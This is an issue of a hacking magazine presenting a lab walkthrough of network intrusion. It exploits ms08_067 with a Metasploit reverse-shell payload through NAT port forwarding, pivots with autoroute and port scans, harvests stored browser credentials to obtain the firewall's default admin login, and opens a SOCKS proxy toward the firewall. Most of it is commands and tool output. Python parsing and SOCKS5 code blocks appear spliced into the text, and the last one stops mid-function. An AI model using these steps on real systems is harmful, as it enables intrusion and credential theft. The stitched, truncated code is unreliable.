November 2023  Edition 6  Issue 11

Learn how Black Hat Hackers hack

7 tips from a cybersecurity expert to stay safe from phishing scams.

To Advertise with us
Contact: admin@hackercoolmagazine.com

Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd

All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed "Attention: Permissions Coordinator," at the address below.

Any references to historical events, real people, or real places are used fictitiously. Names, characters, and places are products of the author's imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd.
Banjara Hills, Hyderabad 500034
Telangana, India.
Website: www.hackercoolmagazine.com
Email Address: admin@hackercoolmagazine.com

Information provided in this Magazine is strictly for educational purpose only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.

Then you will know the truth and the truth will set you free.
John 8:32

Editor's Note
Edition 6 Issue 11

We at Hackercool Magazine wish you a Merry Christmas and a Happy New Year.

"CYBERCRIMINAL THREAT ACTORS [ARE] ADOPTING NEW, VARIED, AND INCREASINGLY CREATIVE ATTACK CHAINS - INCLUDING THE USE OF VARIOUS TDS TOOLS - TO ENABLE MALWARE DELIVERY."

- PROOFPOINT

INSIDE
See what our Hackercool Magazine's November 2023 Issue has in store for you.

1. Black Hat Hacking Scenario: Part 2

2. Cyber Security: The vast majority of us have no idea what the padlock icon on our internet browser is - and it's putting us at risk.

3. Metasploit This Month: Latest Apache Modules

4. Cyber War: Major cyberattack on Australian port suggests sabotage by a "foreign actor".

5. Exploit Writing: Part 3 - Downloading files and payloads.

6. Online Security: Phishing scams: 7 safety tips from a cybersecurity expert.

Downloads

Other Useful Resources
Company's Network Firewall          Attacker's Network Firewall

Target network

Let's see it practically. For this, I install another pfSense Firewall to act as Gateway for the attacker system. Here are the WAN and LAN networks of the target system's firewall.
Starting syslog... done.
Starting CRON... done.
pfSense 2.7.0-RELEASE amd64 Wed Jun 28 03:53:34 UTC 2023
Bootup complete

FreeBSD/amd64 (pfSense.home.arpa) (ttyv0)

VMware Virtual Machine - Netgate Device ID: 2c1a85168b1c5538fa80

*** Welcome to pfSense 2.7.0-RELEASE (amd64) on pfSense ***

 WAN (wan)       -> em0        -> v4/DHCP4: 192.168.249.160/24
 LAN (lan)       -> em1        -> v4: 192.168.223.3/24

 0) Logout (SSH only)                  9) pfTop
 1) Assign Interfaces                 10) Filter Logs
 2) Set interface(s) IP address       11) Restart webConfigurator
 3) Reset webConfigurator password    12) PHP shell + pfSense tools
 4) Reset to factory defaults         13) Update from console
 5) Reboot system                     14) Enable Secure Shell (sshd)
 6) Halt system                       15) Restore recent configuration
 7) Ping host                         16) Restart PHP-FPM
 8) Shell

Enter an option:
The target system's IP address is 192.168.223.6.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        IP Address. . . . . . . . . . . . : 192.168.223.6
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.223.3
Given below is the WAN and LAN network information of the Attacker system's Firewall.

Starting syslog... done.
Starting CRON... done.
pfSense 2.7.0-RELEASE amd64 Wed Jun 28 03:53:34 UTC 2023
Bootup complete

FreeBSD/amd64 (pfSense.home.arpa) (ttyv0)

VMware Virtual Machine - Netgate Device ID: 572b5d2f4031e3be0890

*** Welcome to pfSense 2.7.0-RELEASE (amd64) on pfSense ***

 WAN (wan)       -> em0        -> v4/DHCP4: 192.168.249.159/24
 LAN (lan)       ->            -> v4: 192.168.110.1/24

 0) Logout (SSH only)                  9) pfTop
 1) Assign Interfaces                 10) Filter Logs
 2) Set interface(s) IP address       11) Restart webConfigurator
 3) Reset webConfigurator password    12) PHP shell + pfSense tools
 4) Reset to factory defaults         13) Update from console
 5) Reboot system                     14) Enable Secure Shell (sshd)
 6) Halt system                       15) Restore recent configuration
 7) Ping host                         16) Restart PHP-FPM
 8) Shell

Enter an option:

The attacker system's IP address is 192.168.110.5.
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:93:da:f0 brd ff:ff:ff:ff:ff:ff
    inet 192.168.110.5/24 brd 192.168.110.255 scope global dynamic noprefixroute eth0
       valid_lft 7149sec preferred_lft 7149sec
    inet6 fe80::8aff:8c6:5ba:be98/64 scope link noprefixroute
       valid_lft forever preferred_lft forever

Here's the IP address information of the network I am using for this tutorial.

If you are trying to port forward with non-admin privileges on a system, you can only forward ports above 1024.

Company's Network Firewall          Attacker's Network Firewall
External IP: 192.168.249.160        External IP: 192.168.249.159
Internal IP: 192.168.223.3          Internal IP: 192.168.110.1

Attacker System                     Target system
IP: 192.168.110.5                   IP Address: 192.168.223.6

Here, once again, I am exploiting the ms08_067 vulnerability (I am not going to leave that vulnerability so soon). So, I start with port scanning of port 445.

(kali㉿kali)-[~]
$ nmap -sT -Pn -p445 192.168.249.160
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-04 04:00 EST
Nmap scan report for 192.168.249.160
Host is up (0.0014s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds

So, I load the ms08_067 module and the target is indeed vulnerable. I set the other required options.

According to CrowdStrike's global threat report 2023, Black Hat Hackers used protocols such as RDP, SSH and SMB for lateral movement in cloud environments.

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.249.160
rhosts => 192.168.249.160
msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.249.160:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > set lport 81
lport => 81
msf6 exploit(windows/smb/ms08_067_netapi) >

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.110.5    yes       The listen address (an interface may be specified)
   LPORT     81               yes       The listen port

After all the options are set, I execute the module and the result is given below.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.110.5:81
[*] 192.168.249.160:445 - Automatically detecting the target...
[*] 192.168.249.160:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.249.160:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.249.160:445 - Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms08_067_netapi) >
12
It's this message again. (I don't think this message is going to leave me, just like I am not going to leave the ms08_067 module). On a serious note, the vulnerability is triggered but we got no session. However, I know the exact reason why this module failed now. If you observe the above image, the handler started on the attacker system (192.168.110.5), which is an IP address in the LAN network. There is no chance that a machine on the internet, like our target system, can reach this address. However, one device in the Attacker LAN will know about it. The only device belonging to this network (192.168.110.X) that has communication with the internet is the Attacker network's Router or Firewall. In our case, it is 192.168.249.159.

Our target system can only communicate with this device (192.168.249.159). So, I forward port 81 of 192.168.249.159 to port 81 of my Attacker system (192.168.110.5). Port forwarding can be performed in pfSense (from the Firewall / NAT / Port Forward section). The process may differ slightly but is almost the same in all Routers and Firewalls.

Firewall / NAT / Port Forward / Edit

Edit Redirect Entry

Disabled                 [ ] Disable this rule

No RDR (NOT)             [ ] Disable redirection for traffic matching this rule
                         This option is rarely needed. Don't use this without thorough knowledge of the implications.

Interface                WAN
                         Choose which interface this rule applies to. In most cases 'WAN' is specified.

Address Family           IPv4
                         Select the Internet Protocol version this rule applies to.

Protocol                 TCP/UDP
                         Choose which protocol this rule should match. In most cases 'TCP' is specified.

Source                   [Display Advanced]

Destination              [ ] Invert match    WAN address
                         Address/mask

Destination port range   Other: 81  to  Other: 81  (Custom)
                         Specify the port or port range for the destination of the packet for this mapping. The 'to' field may be left empty if only mapping a single port.

Redirect target IP       Single host  192.168.110.5
                         Address (... link-local addresses scope (fe80:*) to local scope (1))

Redirect target port     81  (Custom)
                         In case of a port range, specify the beginning port of the range (the end port will be
Then, I save the rule. Now, any query coming from the WAN network to port 81 of my Gateway Firewall (192.168.249.159) will be forwarded to port 81 of 192.168.110.5, which is my attacker machine. Next, I set the LHOST option to that of this Gateway Firewall (192.168.249.159).

msf6 exploit(windows/smb/ms08_067_netapi) > check
[+] 192.168.249.160:445 - The target is vulnerable.
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.249.159
lhost => 192.168.249.159
msf6 exploit(windows/smb/ms08_067_netapi) >

Now, let's execute the module.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[-] Handler failed to bind to 192.168.249.159:81:-  --
[*] Started reverse TCP handler on 0.0.0.0:81
[*] 192.168.249.160:445 - Automatically detecting the target...
[*] 192.168.249.160:445 - Fingerprint: Windows XP - Service Pack 2 - lang:Unknown
[*] 192.168.249.160:445 - We could not detect the language pack, defaulting to English
[*] 192.168.249.160:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.249.160:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 192.168.249.160
[*] Meterpreter session 1 opened (192.168.110.5:81 -> 192.168.249.160:37691) at 2023-12-04 04:25:04 -0500

meterpreter > sysinfo
Computer        : ADMIN-FFBE8F88E
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Ha, nothing like a successful meterpreter session.
Company's Network Firewall          Attacker's Network Firewall
External IP: 192.168.249.160        External IP: 192.168.249.159
Internal IP: 192.168.223.3          Internal IP: 192.168.110.1

                 Internet

Attacker System                     Target system
IP: 192.168.110.5                   IP Address: 192.168.223.6

Lateral Movement

In the real world, Black Hat Hackers hack to get access to high-value assets. This can include sensitive data, source code, and other important information. Rarely does a system to which Black Hat Hackers gain initial access contain the high-value assets mentioned above. So Black Hat Hackers, after gaining initial access to a network, try to move around the network in search of high-value assets and finally take control of the entire network. This is known as Lateral Movement or Pivoting.

They use various techniques to achieve this. The first step in Lateral Movement is, of course, to perform reconnaissance to gather information about the network devices. To gather information about the target network, Black Hat Hackers perform steps like viewing the Address Resolution Protocol (ARP) table, viewing network interfaces, network connections and the target network's routing table.

Let's see it practically. On the target network, I have SYSTEM level METERPRETER access on one of the systems (I am talking about our target system, buddy). Meterpreter has many commands built in to perform the above-mentioned reconnaissance.

SOCKS stands for Socket Secure and is an internet protocol that enables the exchange of network packets between a client and a server through a proxy server.

Stdapi: Networking Commands

    Command     Description
    -------     -----------
    arp         Display the host ARP cache
    getproxy    Display the current proxy configuration
    ifconfig    Display interfaces
    ipconfig    Display interfaces
    netstat     Display the network connections
    portfwd     Forward a local port to a remote service
    resolve     Resolve a set of host names on the target
    route       View and modify the routing table

Let's first view the Address Resolution Protocol (ARP) table of the target system.

meterpreter > arp

ARP cache
=========

    IP address     MAC address        Interface
    ----------     -----------        ---------
    192.168.223.3  00:0c:29:a7:5d:30  AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport

meterpreter >

Let's see if the target system belongs to a Dual-homed network or a Single-homed network. A computer in a Dual-homed network is connected to two networks. For example, the pfSense Firewall we are using here (WAN & LAN). The 'ipconfig' command in Windows reveals the network interfaces the system is connected to.

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:6d:5c:31
MTU          : 1500
IPv4 Address : 192.168.223.6
IPv4 Netmask : 255.255.255.0

meterpreter >

The target system belongs to a Single-homed network. No luck here. Next, let's view the routing table on the target system.

meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway        Metric  Interface
    ------           -------          -------        ------  ---------
    0.0.0.0          0.0.0.0          192.168.223.3  10      2
    127.0.0.0        255.0.0.0        127.0.0.1      1       1
    192.168.223.0    255.255.255.0    192.168.223.6  10
    192.168.223.6    255.255.255.255  127.0.0.1      10
    192.168.223.255  255.255.255.255  192.168.223.6  10
    224.0.0.0        240.0.0.0        192.168.223.6  10
    255.255.255.255  255.255.255.255  192.168.223.6  1

No IPv6 routes were found.

meterpreter >

In the above image, you can see that there is only one IP address which appears to be unique: it is 192.168.223.3, apart from 192.168.223.6 which is our target system that we already have access to. Since we already know this system is behind a Firewall, this IP (192.168.223.3) should belong to the Firewall, or we are horribly wrong. If it is a Firewall, it will be remotely administered. The only system from which it can be administered will be our 192.168.223.6, as the routing table doesn't provide information about other systems in this network. Once again, let's assume we can be horribly wrong.
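The reasoning done by hand above (count the non-loopback interfaces, find the default gateway, note that 192.168.223.3 is the only other address the table proves exists) is mechanical enough to script, and a defender reviewing a compromised host's interface and routing tables asks exactly the same questions. The following is an added example, not code from the magazine or from Metasploit: it parses Meterpreter-style ipconfig and route output and answers both questions. The two sample strings are reconstructed from the listings above; the interface numbers shown only for the first two route rows are all the listing provides.

```python
"""Parse Meterpreter-style `ipconfig` and `route` output from a Windows host and
answer: is the host multi-homed, and which address is its default gateway?
Added example, not the magazine's code; samples reconstructed from the article."""
import re
from ipaddress import IPv4Address, IPv4Network
from typing import Dict, List, Optional

# Constructed sample: reconstructed from the article's `ipconfig` listing.
SAMPLE_IPCONFIG = """
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 00:0c:29:6d:5c:31
MTU          : 1500
IPv4 Address : 192.168.223.6
IPv4 Netmask : 255.255.255.0
"""

# Constructed sample: reconstructed from the article's `route` listing
# (interface numbers only where the article shows them).
SAMPLE_ROUTE = """
IPv4 network routes
===================

    Subnet           Netmask          Gateway        Metric  Interface
    ------           -------          -------        ------  ---------
    0.0.0.0          0.0.0.0          192.168.223.3  10      2
    127.0.0.0        255.0.0.0        127.0.0.1      1       1
    192.168.223.0    255.255.255.0    192.168.223.6  10
    192.168.223.6    255.255.255.255  127.0.0.1      10
    192.168.223.255  255.255.255.255  192.168.223.6  10
    224.0.0.0        240.0.0.0        192.168.223.6  10
    255.255.255.255  255.255.255.255  192.168.223.6  1
"""

# subnet, netmask, gateway, metric, optional interface index
ROUTE_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\d+)(?:\s+(\d+))?\s*$")


def parse_ipconfig(text: str) -> List[Dict[str, str]]:
    """Split the output into 'Interface N' blocks; each becomes a dict of its fields."""
    interfaces: List[Dict[str, str]] = []
    for block in re.split(r"\n(?=Interface\s+\d+)", text.strip()):
        fields: Dict[str, str] = {}
        for line in block.splitlines():
            if ":" in line and not line.startswith("="):
                key, _, value = line.partition(":")   # MAC values keep their own colons
                fields[key.strip()] = value.strip()
        if fields:
            interfaces.append(fields)
    return interfaces


def parse_routes(text: str) -> List[Dict[str, object]]:
    """Keep only lines that look like a route row; headers and rulers fail the regex."""
    routes: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = ROUTE_RE.match(line)
        if not m:
            continue
        try:
            routes.append({
                "subnet": IPv4Network(f"{m.group(1)}/{m.group(2)}", strict=False),
                "gateway": IPv4Address(m.group(3)),
                "metric": int(m.group(4)),
                "interface": m.group(5),
            })
        except ValueError:
            continue
    return routes


def is_multi_homed(interfaces: List[Dict[str, str]]) -> bool:
    """More than one non-loopback IPv4 address means the host touches more than one network."""
    addrs = [IPv4Address(i["IPv4 Address"]) for i in interfaces if "IPv4 Address" in i]
    return len([a for a in addrs if not a.is_loopback]) > 1


def default_gateway(routes: List[Dict[str, object]]) -> Optional[IPv4Address]:
    """The 0.0.0.0/0 route with the lowest metric is where off-subnet traffic goes."""
    defaults = [r for r in routes if r["subnet"].prefixlen == 0]
    return min(defaults, key=lambda r: r["metric"])["gateway"] if defaults else None


def other_hosts(routes, interfaces) -> List[IPv4Address]:
    """Gateways that are neither loopback nor the host's own addresses: the only
    other live systems the routing table proves exist."""
    own = {IPv4Address(i["IPv4 Address"]) for i in interfaces if "IPv4 Address" in i}
    seen: List[IPv4Address] = []
    for r in routes:
        gw = r["gateway"]
        if not gw.is_loopback and gw not in own and gw not in seen:
            seen.append(gw)
    return seen


if __name__ == "__main__":
    ifs, rts = parse_ipconfig(SAMPLE_IPCONFIG), parse_routes(SAMPLE_ROUTE)
    print("multi-homed:", is_multi_homed(ifs))
    print("default gateway:", default_gateway(rts))
    print("other hosts seen in routing table:", other_hosts(rts, ifs))
```

On the article's data this reports a single-homed host whose only off-box neighbour is 192.168.223.3, which is the conclusion the text reaches; on a host with a second non-loopback interface the same code would flag it as multi-homed, the case where a pivot point matters most.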
We need to port scan this device to find more information about it. But before that we need to add a route to this device from inside the network as it is not accessible from my attacker system. This can be done by using the 'autoroute' module of Metasploit.

meterpreter > background
Background session 1? [y/N]

msf6 auxiliary(scanner/portscan/tcp) > search autoroute

Matching Modules
================

   #  Name                         Disclosure Date  Rank    Check  Description
   -  ----                         ---------------  ----    -----  -----------
   0  post/multi/manage/autoroute                   normal  No     Multi Manage Network Route via Meterpreter Session

msf6 auxiliary(scanner/portscan/tcp) > use 0
msf6 post(multi/manage/autoroute) > show options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION                   yes       The session to run this module on
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

View the full module info with the info, or info -d command.

msf6 post(multi/manage/autoroute) >

All I have to do to execute this module is to set the session ID of the meterpreter.

msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against ADMIN-FFBE8F88E
[*] Searching for subnets to autoroute.
[+] Route added to subnet 192.168.223.0/255.255.255.0 from host's routing table.
[*] Post module execution completed
msf6 post(multi/manage/autoroute) >

The route is added. Now, we can perform a port scan of this device. Here I am scanning for some common ports to be open on this device.

msf6 post(multi/manage/autoroute) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set ports 80,21,23,25
ports => 80,21,23,25
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.223.3:       - 192.168.223.3:80 - TCP OPEN
^C[*] 192.168.223.3:       - Caught interrupt from the console...
[*] Auxiliary module execution completed
I found port 80 open. Very good. If this is indeed the Firewall and port 80 is open, it means it would be administered using a browser, right? So, all I have to do is see the browser installed on this target system and then try to collect information from it. Although Metasploit has a module for this too, let's just go to the shell and view the "Program Files" folder of our target system.

msf6 auxiliary(scanner/portscan/tcp) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ ADMIN-FFBE8F88E  192.168.110.5:81 -> 192.168.249.160:37691 (192.168.223.6)

 Directory of C:\Program Files

11/16/2023  01:21 PM    <DIR>          .
11/16/2023  01:21 PM    <DIR>          ..
11/16/2023  11:48 AM    <DIR>          Common Files
11/16/2023  11:43 AM    <DIR>          ComPlus Applications
11/16/2023  11:45 AM    <DIR>          Internet Explorer
11/16/2023  11:43 AM    <DIR>          Messenger
11/16/2023  11:45 AM    <DIR>          microsoft frontpage
11/16/2023  11:44 AM    <DIR>          Movie Maker
11/16/2023  11:43 AM    <DIR>          MSN
11/16/2023  11:43 AM    <DIR>          MSN Gaming Zone
11/16/2023  11:44 AM    <DIR>          NetMeeting
11/16/2023  11:44 AM    <DIR>          Online Services
12/04/2023  02:58 PM    <DIR>          Opera
11/16/2023  11:44 AM    <DIR>          Outlook Express
11/16/2023  11:48 AM    <DIR>          VMware
11/16/2023  11:45 AM    <DIR>          Windows Media Player
11/16/2023  11:43 AM    <DIR>          Windows NT
11/16/2023  11:45 AM    <DIR>          xerox
               0 File(s)              0 bytes
              18 Dir(s)  18,827,309,056 bytes free

C:\Program Files>


The target system has two browsers installed. They are Internet Explorer and Opera. Now, I will use Metasploit post enumeration modules to gather credentials from these browsers as shown below.

msf6 auxiliary(scanner/portscan/tcp) > search post/windows/gather/credentials/ie

Matching Modules
================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  post/windows/gather/credentials/ie                   normal  No     Ie credential gatherer

Interact with a module by name or index. For example info 0, use 0 or use post/windows/gather/credentials/ie

msf6 auxiliary(scanner/portscan/tcp) > use 0
msf6 post(windows/gather/credentials/ie) > show options

Module options (post/windows/gather/credentials/ie):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   ARTIFACTS     All              no        Type of artifacts to collect (Accepted: All, web_history)
   EXTRACT_DATA  true             no        Extract data and stores in a separate file
   REGEX         ^password        no        Match a regular expression
   SESSION                        yes       The session to run this module on
   STORE_LOOT    true             no        Store artifacts into loot database

View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/ie) >
msf6 post(windows/gather/credentials/ie) > run

[*] Filtering based on these selections:
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Ie's Index.dat file found
[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
[*] Ie Index.dat downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204043905_default_192.168.223.6_IEindex.dat_960486.dat

[*] Downloading C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012023111620231117\index.dat
[*] Ie Index.dat downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204043906_default_192.168.223.6_IEindex.dat_863745.dat

[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/ie) >
The module runs, downloads and saves any interesting information in binary files as shown above. Nothing in Internet Explorer. Let's collect information from the Opera browser.

msf6 post(windows/gather/credentials/ie) > use post/windows/gather/credentials/opera
msf6 post(windows/gather/credentials/opera) > set session 1
session => 1
msf6 post(windows/gather/credentials/opera) > run

[*] Filtering based on these selections:
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_DATA: true

[*] Opera's Login data file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Opera Software\Opera Stable\Login Data
[*] Opera Login data downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204043958_default_192.168.223.6_operaLoginData_780939.bin
[+] File with data saved: /home/kali/.msf4/loot/20231204043959_default_192.168.223.6_EXTRACTIONSLogin_561779.bin

[*] Opera's Cookies file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Opera Software\Opera Stable\Cookies
[*] Opera Cookies downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204043959_default_192.168.223.6_operaCookies_013243.bin
[+] File with data saved: /home/kali/.msf4/loot/20231204044000_default_192.168.223.6_EXTRACTIONSCooki_794630.bin

[*] Opera's Visited links file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Opera Software\Opera Stable\Visited Links
[*] Opera Visited links downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204044000_default_192.168.223.6_operaVisitedLin_934533.bin

[*] Opera's Web data file found
[*] Downloading C:\Documents and Settings\Administrator\Application Data\Opera Software\Opera Stable\Web Data
[*] Opera Web data downloaded
[+] File saved to: /home/kali/.msf4/loot/20231204044002_default_192.168.223.6_operaWebData_249391.bin
[+] File with data saved: /home/kali/.msf4/loot/20231204044002_default_192.168.223.6_EXTRACTIONSWebD_215559.bin

[*] PackRat credential sweep Completed
[*] Post module execution completed
msf6 post(windows/gather/credentials/opera) >

Black Hat Hackers belonging to the Dark Nexus botnet attack infected numerous IoT devices and then ran a SOCKS proxy on a random port to connect with their server.
We can just use the cat command to view the contents of these files.

(kali㉿kali)-[~]
$ cat /home/kali/.msf4/loot/20231204043958_default_192.168.223.6_operaLoginData_780939.bin
... indexstats_originstats CREATE INDEX stats_origin ON stats(origin_domain) ... tablestatsstats CREATE TABLE stats (origin_domain VARCHAR NOT NULL, username_value VARCHAR, dismissal_count INTEGER, update_time INTEGER NOT NULL, UNIQUE(origin_domain, username_value)) ... indexsqlite_autoindex_stats_1stats ... indexlogins_signonlogins CREATE INDEX logins_signon ON logins (signon_realm) ... tableloginslogins CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, usernam...

In one of the dumps the module downloaded, I found some credentials.

(kali㉿kali)-[~]
$ cat /home/kali/.msf4/loot/20231204044002_default_192.168.223.6_EXTRACTIONSWebD_215559.bin
dst                   192.168.223.6
dstbeginport_cust     1000
dstbeginport_cust     445
dstendport_cust       445
dstendport_cust       65535
localbeginport_cust   445
localip               192.168.223.6
src                   192.168.223.6
usernamefld           admin
usernamefld           pfsense
This is exciting. You know why? The credentials I got are the default credentials of the pfSense Firewall. It's confirmed this device is the Gateway Firewall and now we can own it just like our Windows XP. We already have the credentials, but how to log in to the Firewall? There are a few ways to do it. Here, we will use a proxy server.

A proxy server is a server that acts as a gateway between the local network and the Wide Area Network (in this case). So, if I run a Proxy Server, it will act as a gateway between the local network (192.168.223.X) and my attacker system's network (192.168.110.X) through the route we already added.

Let's see it practically. Metasploit has a SOCKS proxy server module (Seriously, is there anything Metasploit cannot do?).
msf6 post(windows/gather/credentials/opera) > search socks

Matching Modules
================

   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  auxiliary/server/socks_proxy                              normal  No     SOCKS Proxy Server
   1  auxiliary/server/socks_unc                                normal  No     SOCKS Proxy UNC Path Redirection
   2  auxiliary/scanner/http/sockso_traversal  2012-03-14       normal  No     Sockso Music Host Server 1.5 Directory Traversal

"I was hooked in before hacking was even illegal." - Kevin Mitnick

msf6 post(windows/gather/credentials/opera) > use 0
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  1080             yes       The port to listen on
   VERSION  5                yes       The SOCKS version to use (Accepted: 4a, 5)

   When VERSION is 5:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   USERNAME                   no        Proxy username for SOCKS5 listener

Auxiliary action:

msf6 auxiliary(server/socks_proxy) > run

[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
Now, all we have to do is connect to this Proxy Server on 127.0.0.1:1080. Note that this Proxy Server uses the route added by the autoroute module earlier to relay the data to us. I open a browser and change its settings to connect through a proxy.
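The exchange the browser performs with the proxy at 127.0.0.1:1080 is SOCKS5 (RFC 1928), the protocol described in the sidebar above. The block below is an added example, not the magazine's code and not Metasploit's socks_proxy implementation: it builds and parses both sides of the handshake as bytes (client greeting, server method choice, CONNECT request, server reply), using 127.0.0.1:1080 and 192.168.223.3:80 from the article as the sample proxy and destination, and ends with the three-byte greeting signature a network monitor can apply to the first packet of a new TCP flow to notice a SOCKS5 handshake on a port where none is expected.

```python
"""SOCKS5 (RFC 1928) handshake messages, both directions, plus a first-packet check
for a network monitor.  Added example, not code from the magazine or from Metasploit."""
import struct
from ipaddress import IPv4Address
from typing import List, Tuple

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_NO_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03
REPLY_TEXT = {0: "succeeded", 1: "general failure", 2: "not allowed by ruleset",
              3: "network unreachable", 4: "host unreachable", 5: "connection refused",
              6: "TTL expired", 7: "command not supported", 8: "address type not supported"}


def client_greeting(methods=(METHOD_NO_AUTH,)) -> bytes:
    """VER | NMETHODS | METHODS...  The very first bytes a SOCKS5 client sends."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def server_method_choice(greeting: bytes, allow_no_auth: bool = True) -> bytes:
    """VER | METHOD  The server picks one offered method, or 0xFF to refuse."""
    ver, n = greeting[0], greeting[1]
    offered = greeting[2:2 + n]
    if ver != SOCKS_VERSION or len(offered) != n:
        raise ValueError("malformed greeting")
    chosen = METHOD_NO_AUTH if allow_no_auth and METHOD_NO_AUTH in offered else METHOD_NO_ACCEPTABLE
    return bytes([SOCKS_VERSION, chosen])


def connect_request(host: str, port: int) -> bytes:
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT  Ask the proxy to reach host:port."""
    try:
        addr = bytes([ATYP_IPV4]) + IPv4Address(host).packed
    except ValueError:                       # not a literal IPv4: send as a domain name
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def parse_connect_request(req: bytes) -> Tuple[str, int]:
    """What the proxy reads off the wire: the destination the client wants."""
    if req[0] != SOCKS_VERSION or req[1] != CMD_CONNECT or req[2] != 0x00:
        raise ValueError("not a SOCKS5 CONNECT")
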